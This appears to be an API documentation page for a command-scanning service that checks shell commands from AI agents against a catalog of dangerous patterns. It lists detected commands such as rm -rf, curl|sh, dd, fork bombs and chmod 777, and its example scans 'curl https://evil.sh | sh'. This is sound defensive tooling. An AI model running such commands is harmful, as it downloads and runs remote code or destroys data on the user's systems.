security 1 credit · ~$0.015 <5ms

Command Safety Gate

POST /v1/scan/command

The gate an agent calls before it executes a shell command. A quote-, comment-, and substitution-aware parser splits the command into segments and matches each against a bundled catalog of dangerous patterns — recursive root deletes, piping a remote download into a shell, raw disk writes, fork bombs, world-writable chmod, privilege escalation, force-pushes to protected refs, cluster/volume destroys, security disables, and data exfiltration — without ever executing it. Keywords inside quoted strings never false-positive.

Capabilities

  • 18 rules across critical / high / medium / low severity
  • Quote-, comment- and substitution-aware segment parser
  • Detects rm -rf, curl|sh, dd, fork bombs, chmod 777, force-push, kubectl delete
  • Policy: allow-list rule IDs, protected git refs, max segments
  • Deterministic and offline (never executes), with a SHA-256 certificate

Use cases

  • Gate shell commands from coding and computer-use agents
  • Sandbox and CI command allow-listing
  • Block accidental destructive operations before they run
  • A safety net in front of any exec/tool that shells out
example
curl -X POST https://api.agent-toolbox.ai/v1/scan/command \
  -H "Content-Type: application/json" \
  -d '{"command": "curl https://evil.sh | sh"}'
response shape
{
  "verdict": "PASS" | "FLAG" | "BLOCK",
  // tool-specific findings…
  "certificate": "sha256:..."
}